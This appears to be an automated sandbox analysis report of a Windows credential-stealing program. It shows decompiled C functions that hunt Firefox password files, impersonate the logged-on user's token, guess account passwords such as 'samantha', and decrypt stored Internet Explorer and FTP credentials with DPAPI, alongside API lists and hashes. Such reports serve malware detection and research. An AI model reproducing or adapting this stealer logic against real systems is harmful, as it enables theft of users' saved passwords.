Instruction Fuzzy Hash: 86C09B7210460856C7155F65C98579A79D85B103CCF5081357905555B1D6B8D5D0C5DC

Uniqueness

Uniqueness Score: -1.00%

Function 004017EC, Relevance: 1.3, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004017EC(intOrPtr _a4) {
				void* _t4;

				_t4 = LocalAlloc(0x40, _a4 + 0x80); // executed
				return _t4;
			}

0x004017fa
0x00401800

APIs

LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: c7da79b5d8410c9ad293d4aa48da395a822b013a6b1f115db719f7d1cd44fc81
Instruction ID: c45b4f91a8b266b6492c347f0c6a08b042b0071dba384013e78457423f248dae
Opcode Fuzzy Hash: c7da79b5d8410c9ad293d4aa48da395a822b013a6b1f115db719f7d1cd44fc81
Instruction Fuzzy Hash: 81B092B120030826E240E789C803F5A728C9B14B8CF008221BB44A6282D8ACF89045AD

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00409484, Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 169
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409484(signed int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t52;
				signed int _t54;
				CHAR* _t56;
				void* _t60;
				char* _t63;
				int _t65;
				char* _t68;
				int _t75;
				int _t77;
				int _t80;
				signed int _t82;
				void* _t84;
				char* _t93;
				signed int _t99;
				signed int* _t100;
				signed int _t101;

				_t99 = __ecx;
				_v332 = 0;
				_t52 = _a16;
				if(_t52 == 0 ||  *_t52 == 0) {
					L31:
					return E004017D5(_v332);
				} else {
					_t54 = E004024D7(_a16);
					__eflags = _t54;
					if(_t54 != 0) {
						_t56 = E00401D15(_a16, "*.*");
					} else {
						_t56 = E00401D15(_a16, "\*.*");
					}
					_v332 = _t56;
					E00401803( &_v324, 0x13e);
					_t60 = FindFirstFileA(_v332,  &_v324);
					_v328 = _t60;
					__eflags = _t60 + 1;
					if(_t60 + 1 != 0) {
						do {
							_t100 =  &_v324;
							__eflags =  *_t100 & 0x00000010;
							if(( *_t100 & 0x00000010) == 0) {
								_v336 =  &(_t100[0xb]);
								__eflags =  *0x415824 - 3;
								if( *0x415824 != 3) {
									_t63 = StrStrIA(_v336, "signons.sqlite");
									__eflags = _t63;
									if(_t63 != 0) {
										E004090A3(__eflags, _a4, E00401D69(E00401D15(_a16, "\\"), _v336), _a8, _a12);
										E004017D5(_t90);
									}
									_t65 = lstrlenA(_v336);
									__eflags = _t65 - 2;
									if(_t65 < 2) {
										L25:
										_push(StrStrIA(_v336, "signons.txt"));
										_push(StrStrIA(_v336, "signons2.txt"));
										_t68 = StrStrIA(_v336, "signons3.txt");
										_pop(_t101);
										_pop(_t99);
										__eflags = _t68;
										if(_t68 != 0) {
											goto L28;
										}
										__eflags = _t101;
										if(_t101 != 0) {
											goto L28;
										}
										_t99 = _t99;
										__eflags = _t99;
										if(_t99 == 0) {
											goto L29;
										}
										goto L28;
									} else {
										__eflags =  *((short*)( &(_v336[_t65]) - 2)) - 0x732e;
										if( *((short*)( &(_v336[_t65]) - 2)) != 0x732e) {
											goto L25;
										}
										L28:
										E0040912E(__eflags, _a4, E00401D69(E00401D15(_a16, "\\"), _v336), _a8, _a12);
										E004017D5(_t71);
										goto L29;
									}
								}
								_t93 = StrStrIA(_v336, "prefs.js");
								__eflags = _t93;
								if(_t93 != 0) {
									E00403E4C(_a4, E00401D69(E00401D15(_a16, "\\"), _v336), 0xbeef0001);
									E004017D5(_t96);
								}
								goto L29;
							}
							_t77 = lstrcmpiA(0x414806,  &(_t100[0xb]));
							__eflags = _t77;
							if(_t77 != 0) {
								_t80 = lstrcmpiA(0x414808,  &( &_v324->cFileName));
								__eflags = _t80;
								if(_t80 != 0) {
									_t82 = E004024D7(_a16);
									__eflags = _t82;
									if(_t82 != 0) {
										_t84 = E00401D15(_a16, 0);
									} else {
										_t84 = E00401D15(_a16, "\\");
									}
									E00409484(_t99, _a4, _a8, _a12, E00401D69(_t84,  &( &_v324->cFileName)));
									E004017D5(_t85);
								}
							}
							L29:
							_t75 = FindNextFileA(_v328,  &_v324);
							__eflags = _t75;
						} while (_t75 != 0);
						FindClose(_v328);
					}
					goto L31;
				}
			}

0x00409484
0x0040948d
0x0040949a
0x0040949c
0x004096ec
0x004096f8
0x004094a8
0x004094ab
0x004094b0
0x004094b2
0x004094cb
0x004094b4
0x004094bc
0x004094bc
0x004094d0
0x004094e2
0x004094f4
0x004094f9
0x004094ff
0x00409500
0x00409506
0x00409506
0x0040950c
0x00409512
0x0040959e
0x004095a4
0x004095ab
0x004095fe
0x00409603
0x00409605
0x0040962b
0x00409630
0x00409630
0x0040963b
0x00409640
0x00409643
0x00409659
0x00409669
0x0040967a
0x00409686
0x0040968b
0x0040968c
0x0040968d
0x0040968f
0x00000000
0x00000000
0x00409691
0x00409693
0x00000000
0x00000000
0x00409695
0x00409695
0x00409697
0x00000000
0x00000000
0x00000000
0x00409645
0x00409650
0x00409655
0x00000000
0x00000000
0x00409699
0x004096bd
0x004096c2
0x00000000
0x004096c2
0x00409643
0x004095b8
0x004095bd
0x004095bf
0x004095e4
0x004095e9
0x004095e9
0x00000000
0x004095ee
0x00409521
0x00409526
0x00409528
0x0040953e
0x00409543
0x00409545
0x0040954f
0x00409554
0x00409556
0x0040956c
0x00409558
0x00409560
0x00409560
0x0040958c
0x00409591
0x00409591
0x00409545
0x004096c7
0x004096d4
0x004096d9
0x004096d9
0x004096e7
0x004096e7
0x00000000
0x00409500

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 004094F4
lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00409521
lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 0040953E
FindNextFileA.KERNEL32(?,?,00000000,00000000,?,?,004140DA,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite), ref: 004096D4
FindClose.KERNEL32(?,?,?,00000000,00000000,?,?,004140DA,00000000,?,signons2.txt,00000000,?,signons.txt,?,?), ref: 004096E7

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

Strings

signons.sqlite, xrefs: 004095F3
signons.txt, xrefs: 00409659
signons2.txt, xrefs: 0040966A
signons3.txt, xrefs: 0040967B
*.*, xrefs: 004094C3
\*.*, xrefs: 004094B4
prefs.js, xrefs: 004095AD

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
API String ID: 3040542784-1405255088
Opcode ID: 21b12ee9a0ac83c949ae5836015204b49b1158e9b7e439ffb12c41c9bead4261
Instruction ID: b663840663784a3fe1e581d68bb3c28c37a014c69344c9f8a2cf847aa5b90957
Opcode Fuzzy Hash: 21b12ee9a0ac83c949ae5836015204b49b1158e9b7e439ffb12c41c9bead4261
Instruction Fuzzy Hash: 77514F71510109BADF226F62DC02AEE7A79AF54308F1444BBB408B50F2D67E9DE09E5D

Uniqueness

Uniqueness Score: -1.00%

Function 00402C05, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 105
registryprocessCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00402C05(void* __eax, void* __edx, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				char _v276;
				long _v304;
				void* _v312;
				void* _v316;
				int _v320;
				int _v324;
				void* _t33;
				int _t36;
				void* _t44;
				void* _t47;
				int* _t56;
				void* _t60;
				int _t64;

				if( *0x4143d1 == 0 ||  *0x4143d5 == 0 ||  *0x41440d == 0 ||  *0x414411 == 0) {
					return 0;
				} else {
					_t60 = 0;
					_v16 =  *0x4143d1();
					_v312 = 0x128;
					_t33 = CreateToolhelp32Snapshot(2, 0);
					if(_t33 != 0xffffffff) {
						_v316 = _t33;
						_t36 = Process32First(_v316,  &_v312);
						while(_t36 != 0) {
							if(StrStrIA( &_v276, "explorer.exe") == 0) {
								L23:
								_t36 = Process32Next(_v316,  &_v312);
								continue;
							} else {
								_v320 = 0;
								_t44 =  *0x4143d5(_v304,  &_v320);
								_t64 = _v320;
								if(_t44 == 0 || _t64 != _v16) {
									goto L23;
								} else {
									_t47 = OpenProcess(0x2000000, 0, _v304);
									if(_t47 == 0) {
										goto L23;
									} else {
										_v12 = _t47;
										if(OpenProcessToken(_v12, 0x201eb,  &_v8) == 0) {
											CloseHandle(_v12);
											goto L23;
										} else {
											if(ImpersonateLoggedOnUser(_v8) == 0) {
												CloseHandle(_v8);
												CloseHandle(_v12);
												goto L23;
											} else {
												_t60 = _t60 + 1;
												_v324 = 0;
												_t56 =  &_v324;
												_push(_t56);
												_push(0xf003f);
												L00410E12();
												if(_t56 == 0 && _v324 != 0) {
													_push(_v324);
													_pop( *0x4140fe);
												}
												if(_a4 != 0) {
													_push(_v8);
													_pop( *__eax);
												}
											}
										}
									}
								}
							}
							break;
						}
						CloseHandle(_v316);
					}
					return _t60;
				}
			}

0x00402c1c
0x00402c3d
0x00402c40
0x00402c40
0x00402c48
0x00402c4b
0x00402c59
0x00402c61
0x00402c67
0x00402c7a
0x00402c7f
0x00402c9a
0x00402d73
0x00402d80
0x00000000
0x00402ca0
0x00402ca0
0x00402cb7
0x00402cbd
0x00402cc5
0x00000000
0x00402cd4
0x00402ce6
0x00402ce8
0x00000000
0x00402cee
0x00402cee
0x00402d05
0x00402d6e
0x00000000
0x00402d07
0x00402d12
0x00402d5c
0x00402d64
0x00000000
0x00402d14
0x00402d14
0x00402d15
0x00402d1f
0x00402d25
0x00402d26
0x00402d2b
0x00402d32
0x00402d3d
0x00402d43
0x00402d43
0x00402d4e
0x00402d50
0x00402d53
0x00402d53
0x00402d55
0x00402d12
0x00402d05
0x00402ce8
0x00402cc5
0x00000000
0x00402c9a
0x00402d90
0x00402d90
0x00402d99
0x00402d99

APIs

WTSGetActiveConsoleSessionId.KERNEL32(?,?,00410B93,00410C2C), ref: 00402C42
CreateToolhelp32Snapshot.KERNEL32 ref: 00402C59
Process32First.KERNEL32 ref: 00402C7A
StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,00000128,?,explorer.exe,?,00000128,00000002,00000000), ref: 00402CB7
OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
OpenProcessToken.ADVAPI32(00410B93,000201EB,00410C2C,02000000,00000000,?), ref: 00402CFD
ImpersonateLoggedOnUser.ADVAPI32(00410C2C), ref: 00402D0A
RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90

Strings

explorer.exe, xrefs: 00402C87

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: OpenProcess$SessionUser$ActiveCloseConsoleCreateCurrentFirstHandleImpersonateLoggedProcess32SnapshotTokenToolhelp32
String ID: explorer.exe
API String ID: 4004126742-3187896405
Opcode ID: d7b33712bffa344649a6c7b91db19c6665e4b5ef021c38cbfc5ccfe492207028
Instruction ID: ccbd0d7988a87a0baa37139996db17261bf584517116b24148bb5ef45f8ddf5c
Opcode Fuzzy Hash: d7b33712bffa344649a6c7b91db19c6665e4b5ef021c38cbfc5ccfe492207028
Instruction Fuzzy Hash: 15418B72900218ABDF219F61DD4ABDE7AB5AF04304F0085B6A104B51E1EBFC9ED1DE58

Uniqueness

Uniqueness Score: -1.00%

Function 0041098D, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 135
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0041098D(signed int __eax, void* __ecx, signed int __edx) {
				void* _v8;
				CHAR* _v12;
				char _v16;
				CHAR* _v20;
				CHAR* _v24;
				CHAR* _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _t46;
				char _t50;
				char _t54;
				char _t57;
				char _t59;
				char _t65;
				int _t68;
				char _t69;
				char _t70;
				void* _t71;
				signed int _t73;
				signed int _t74;
				CHAR* _t75;

				_t71 = __ecx;
				_t73 = __edx ^ __eax;
				_t42 = __eax ^ _t73;
				_t74 = _t73 ^ __eax ^ _t73;
				if( *0x414411 == 0 ||  *0x41441d == 0) {
					return 0;
				} else {
					_t69 =  *0x417691; // 0x6dcfa0
					while(1) {
						_t70 = _t69;
						__eflags = _t70;
						if(_t70 == 0) {
							break;
						}
						E00402AF8(_t42, _t74);
						__eflags =  *0x417695;
						if( *0x417695 == 0) {
							L7:
							_v8 = 0;
							_t46 = LogonUserA( *(_t70 + 4), 0,  *(_t70 + 4), 2, 0,  &_v8);
							__eflags = _t46;
							if(_t46 == 0) {
								_v12 = E0040294B( *(_t70 + 4));
								_t50 = LCMapStringA(0x400, 0x100,  *(_t70 + 4), lstrlenA( *(_t70 + 4)), _v12, _t49);
								__eflags = _t50;
								if(_t50 == 0) {
									L12:
									E004017D5(_v12);
									_t75 = "samantha";
									L13:
									_v8 = 0;
									_t54 = LogonUserA( *(_t70 + 4), 0, _t75, 2, 0,  &_v8);
									__eflags = _t54;
									if(_t54 != 0) {
										goto L14;
									}
								} else {
									_v8 = 0;
									_t65 = LogonUserA( *(_t70 + 4), 0, _v12, 2, 0,  &_v8);
									__eflags = _t65;
									if(_t65 == 0) {
										goto L12;
									} else {
										E004017D5(_v12);
										goto L14;
									}
								}
							} else {
								L14:
								_v44 = 0x20;
								_v40 = 1;
								 *_t23 =  *(_t70 + 4);
								 *_t25 =  *((intOrPtr*)(_t70 + 8));
								_v28 = 0;
								_v24 = 0;
								_v20 = 0;
								_v16 = 0;
								_t57 =  &_v44;
								_push(_t57);
								_push(_v8);
								L00410E96();
								__eflags = _t57;
								if(_t57 == 0) {
									_v48 = 0;
								} else {
									__eflags = _v16;
									if(_v16 != 0) {
										_push(_v16);
										_pop( *0x4140fe);
									}
									_v48 = 1;
								}
								_t59 = ImpersonateLoggedOnUser(_v8);
								_t60 = _t59;
								__eflags = _t59;
								if(__eflags != 0) {
									E004105CE(_t60, _t71, _t74, __eflags);
									__eflags =  *0x414409;
									if( *0x414409 != 0) {
										RevertToSelf();
									}
									 *0x4140fe = 0x80000001;
								}
								__eflags = _v48;
								if(_v48 != 0) {
									_push(_v16);
									_push(_v8);
									L00410E9C();
								}
								CloseHandle(_v8);
							}
							asm("cld");
							_t42 = 0;
							_t71 = 0xffffffff;
							asm("repne scasb");
							__eflags =  *_t75;
							if( *_t75 != 0) {
								goto L13;
							}
						} else {
							_t68 = lstrcmpiA( *0x417695,  *(_t70 + 4));
							_t42 = _t68;
							__eflags = _t68;
							if(_t68 != 0) {
								goto L7;
							} else {
							}
						}
						_t69 =  *_t70;
					}
					return 1;
				}
			}

0x0041098d
0x00410995
0x00410997
0x00410999
0x004109a2
0x004109b2
0x004109b3
0x004109b3
0x00410b4f
0x00410b4f
0x00410b4f
0x00410b51
0x00000000
0x00000000
0x004109be
0x004109c3
0x004109ca
0x004109e3
0x004109e3
0x004109fa
0x00410a00
0x00410a02
0x00410a11
0x00410a2e
0x00410a33
0x00410a35
0x00410a62
0x00410a65
0x00410a6a
0x00410a6f
0x00410a6f
0x00410a84
0x00410a8a
0x00410a8c
0x00000000
0x00000000
0x00410a37
0x00410a37
0x00410a4e
0x00410a54
0x00410a56
0x00000000
0x00410a58
0x00410a5b
0x00000000
0x00410a5b
0x00410a56
0x00410a04
0x00410a92
0x00410a92
0x00410a99
0x00410aa3
0x00410aa9
0x00410aac
0x00410ab3
0x00410aba
0x00410ac1
0x00410ac8
0x00410acb
0x00410acc
0x00410acf
0x00410ad4
0x00410ad6
0x00410af0
0x00410ad8
0x00410ad8
0x00410adc
0x00410ade
0x00410ae1
0x00410ae1
0x00410ae7
0x00410ae7
0x00410afa
0x00410b00
0x00410b00
0x00410b02
0x00410b04
0x00410b09
0x00410b10
0x00410b12
0x00410b12
0x00410b18
0x00410b18
0x00410b22
0x00410b26
0x00410b28
0x00410b2b
0x00410b2e
0x00410b2e
0x00410b36
0x00410b36
0x00410b3b
0x00410b3c
0x00410b3e
0x00410b43
0x00410b45
0x00410b47
0x00000000
0x00000000
0x004109cc
0x004109d5
0x004109da
0x004109da
0x004109dc
0x00000000
0x00000000
0x004109de
0x004109dc
0x00410b4d
0x00410b4d
0x00410b5f
0x00410b5f

APIs

lstrcmpiA.KERNEL32(?), ref: 004109D5
LogonUserA.ADVAPI32(?,00000000,?,00000002,00000000,00000000), ref: 004109FA
lstrlenA.KERNEL32(?,?), ref: 00410A17
LCMapStringA.KERNEL32(00000400,00000100,?,00000000,?,00000000,?,?), ref: 00410A2E
LogonUserA.ADVAPI32(?,00000000,?,00000002,00000000,00000000), ref: 00410A4E
LoadUserProfileA.USERENV(00000000,00000020,?,?), ref: 00410ACF
ImpersonateLoggedOnUser.ADVAPI32(00000000,00000000,00000020,?,?), ref: 00410AFA
RevertToSelf.ADVAPI32 ref: 00410B12
UnloadUserProfile.USERENV(00000000,00000000), ref: 00410B2E
CloseHandle.KERNEL32(00000000), ref: 00410B36

Strings

samantha, xrefs: 00410A6A, 00410A7E
, xrefs: 00410A92
H$j, xrefs: 004109C3

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: User$LogonProfile$CloseHandleImpersonateLoadLoggedRevertSelfStringUnloadlstrcmpilstrlen
String ID: $H$j$samantha
API String ID: 1348396137-1985755575
Opcode ID: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
Instruction ID: 97e36a9f464fd7594aaf26f4fe361f5543e1ef418d0b81fc890e2415056c999a
Opcode Fuzzy Hash: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
Instruction Fuzzy Hash: 54516E71A00208EFEF119FA1DD46BDEBA75EB04318F14C066E510A91E2D7F99AD0DF29

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1A9, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040A1A9(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v1028;
				char _v2052;
				int _v2056;
				int _v2060;
				intOrPtr _v2064;
				char _v2068;
				char _v2072;
				char _v2076;
				void* _v2080;
				char _v2084;
				void* _v2088;
				char _v2092;
				intOrPtr _v2096;
				void* _t53;
				int _t58;

				E00409EFB(_a4,  &_v1028, _a20);
				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v2052, 0x3ff, 0, 0);
				_v2068 = 0x10;
				_v2064 = 2;
				_v2060 = 0;
				_v2056 = 0;
				_t53 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v2076,  &_v2072,  &_v2068, 0);
				if(_v2076 == 0 || _v2072 == 0) {
					return _t53;
				}
				_v2096 = 0xbeef0000;
				if(lstrcmpiA( &_v1028, "Internet Explorer") == 0) {
					L5:
					_t58 = StrStrIA( &_v2052, "DPAPI: ");
					if(_t58 == 0) {
						_t58 = E0040A13B(_v2096, _a12, _v2072, _v2076, _a16);
					} else {
						if( *0x41442d != 0) {
							_push(_v2076);
							_pop( *_t29);
							_push(_v2072);
							_pop( *_t31);
							_t58 =  *0x41442d( &_v2084, 0, 0, 0, 0, 1,  &_v2092);
							if(_t58 != 0) {
								E0040A13B(_v2096, _a12, _v2088, _v2092, _a16);
								_t58 = LocalFree(_v2088);
							}
						}
					}
					L11:
					_push(_v2072);
					L00410DCA();
					return _t58;
				}
				_v2096 = 0xbeef0001;
				if(lstrcmpiA( &_v1028, "WininetCacheCredentials") == 0) {
					goto L5;
				}
				_v2096 = 0xbeef0002;
				_t58 = lstrcmpiA( &_v1028, "MS IE FTP Passwords");
				if(_t58 != 0) {
					goto L11;
				}
				goto L5;
			}

0x0040a1bf
0x0040a1dd
0x0040a1e2
0x0040a1ec
0x0040a1f6
0x0040a200
0x0040a234
0x0040a23e
0x0040a361
0x0040a361
0x0040a251
0x0040a26e
0x0040a2b2
0x0040a2c3
0x0040a2c5
0x0040a350
0x0040a2c7
0x0040a2ce
0x0040a2d4
0x0040a2da
0x0040a2e0
0x0040a2e6
0x0040a30a
0x0040a30c
0x0040a326
0x0040a331
0x0040a331
0x0040a336
0x0040a2ce
0x0040a355
0x0040a355
0x0040a35b
0x00000000
0x0040a35b
0x0040a270
0x0040a28d
0x00000000
0x00000000
0x0040a28f
0x0040a2a5
0x0040a2ac
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00409EFB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F34
Part of subcall function 00409EFB: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F3D

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A1DD
lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A267
lstrcmpiA.KERNEL32(?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A286
lstrcmpiA.KERNEL32(?,MS IE FTP Passwords,?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A2A5
StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A2BE
CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A304
LocalFree.KERNEL32(?), ref: 0040A331
CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A35B

Strings

MS IE FTP Passwords, xrefs: 0040A299
WininetCacheCredentials, xrefs: 0040A27A
Internet Explorer, xrefs: 0040A25B
DPAPI: , xrefs: 0040A2B2

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
API String ID: 2957877119-3076635702
Opcode ID: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
Instruction ID: d0109d7229b507364c02bffd69db74d2b73ca55b941890eea464c4d2f255e551
Opcode Fuzzy Hash: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
Instruction Fuzzy Hash: CE415E7240021DEADF219F50CC42FDA77B9BF08304F0480E6B64475190DB759AE58FD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA2E, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040BA2E(void* __eax, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				int _v8;
				char _v12;
				char _v16;
				int _v20;
				char _v24;
				char _v28;
				int _v32;
				char _v36;
				void* _v40;
				void* _v44;
				char _v48;
				void* _v52;
				int _v56;
				char* _v60;
				void* _t55;
				void* _t56;
				int _t77;
				int _t78;

				_t55 = __eax;
				if(_a16 == 0 ||  *0x41442d == 0) {
					return _t55;
				} else {
					_t56 = _a16;
					__eflags =  *0x41914c - _t56; // 0x0
					if(__eflags < 0) {
						__eflags =  *0x419150 - _t56; // 0x5
						if(__eflags < 0) {
							__eflags =  *0x419154 - _t56; // 0x3
							if(__eflags < 0) {
								E0040B1AB(_a12,  *0x41914c,  &_v8,  &_v12,  &_v16);
								E0040B1AB(_a12,  *0x419154,  &_v20,  &_v24,  &_v28);
								E0040B1AB(_a12,  *0x419150,  &_v32,  &_v36,  &_v40);
								_push(_v32);
								_pop( *_t16);
								_push(_v40);
								_pop( *_t18);
								_v52 = 0;
								_t56 =  *0x41442d( &_v48, 0, 0, 0, 0, 1,  &_v56);
								__eflags = _t56;
								if(_t56 != 0) {
									__eflags = _v52;
									if(_v52 != 0) {
										__eflags = _v56 - _v32;
										if(_v56 <= _v32) {
											asm("cld");
											asm("jecxz 0x4");
											memcpy(_v40, _v52, _v56);
											_push(_v56);
											_pop( *_t29);
											_t56 = LocalFree(_v52);
											__eflags = _v8;
											if(_v8 != 0) {
												__eflags = _v20;
												if(_v20 != 0) {
													__eflags = _v32;
													if(_v32 != 0) {
														_v60 = E004017EC(_v8);
														E00401823(_v16, _v60, _v8);
														_t77 = StrCmpNIA(_v60, "ftp://", lstrlenA("ftp://"));
														__eflags = _t77;
														if(_t77 != 0) {
															_t77 = StrCmpNIA(_v60, "http://", lstrlenA("http://"));
														}
														_t78 = _t77;
														__eflags = _t78;
														if(_t78 != 0) {
															_t78 = StrCmpNIA(_v60, "https://", lstrlenA("https://"));
														}
														__eflags = _t78;
														if(_t78 == 0) {
															E00401486(_a8, _a20);
															E00401486(_a8,  *0x419148);
															E004014BC(_a8, _v16, _v8);
															E004014BC(_a8, _v28, _v20);
															E004014BC(_a8, _v40, _v32);
														}
														return E004017D5(_v60);
													}
												}
											}
										}
									}
								}
							}
						}
					}
					return _t56;
				}
			}

0x0040ba2e
0x0040ba3a
0x0040ba48
0x0040ba4b
0x0040ba4b
0x0040ba4e
0x0040ba54
0x0040ba5a
0x0040ba60
0x0040ba66
0x0040ba6c
0x0040ba87
0x0040baa1
0x0040babb
0x0040bac0
0x0040bac3
0x0040bac6
0x0040bac9
0x0040bacc
0x0040baeb
0x0040baeb
0x0040baed
0x0040baf3
0x0040baf7
0x0040bb00
0x0040bb03
0x0040bb09
0x0040bb13
0x0040bb15
0x0040bb17
0x0040bb1a
0x0040bb20
0x0040bb25
0x0040bb29
0x0040bb2f
0x0040bb33
0x0040bb39
0x0040bb3d
0x0040bb4b
0x0040bb57
0x0040bb74
0x0040bb74
0x0040bb76
0x0040bb8b
0x0040bb8b
0x0040bb90
0x0040bb90
0x0040bb92
0x0040bba7
0x0040bba7
0x0040bbac
0x0040bbae
0x0040bbb6
0x0040bbc4
0x0040bbd2
0x0040bbe0
0x0040bbee
0x0040bbee
0x00000000
0x0040bbf6
0x0040bb3d
0x0040bb33
0x0040bb29
0x0040bb03
0x0040baf7
0x0040baed
0x0040ba6c
0x0040ba60
0x0040bbfe
0x0040bbfe

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BAE5
LocalFree.KERNEL32(00000000,?), ref: 0040BB20
lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB61
StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB6F
lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB7D
StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB8B
lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB99
StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBA7

Strings

https://, xrefs: 0040BB94, 0040BB9F
ftp://, xrefs: 0040BB5C, 0040BB67
http://, xrefs: 0040BB78, 0040BB83

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$CryptDataFreeLocalUnprotect
String ID: ftp://$http://$https://
API String ID: 3968356742-2804853444
Opcode ID: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
Instruction ID: bf0502dff25623896b3ecf7b6da0d74d92ec6f4b9260b97e51de09929ef1935b
Opcode Fuzzy Hash: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
Instruction Fuzzy Hash: 9E51E772900209FBDF12AF91ED45EEE7B7AEB48314F108136F510B11A1D7799A90EB98

Uniqueness

Uniqueness Score: -1.00%

Function 00402C05, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 105
registryprocessCOMMON

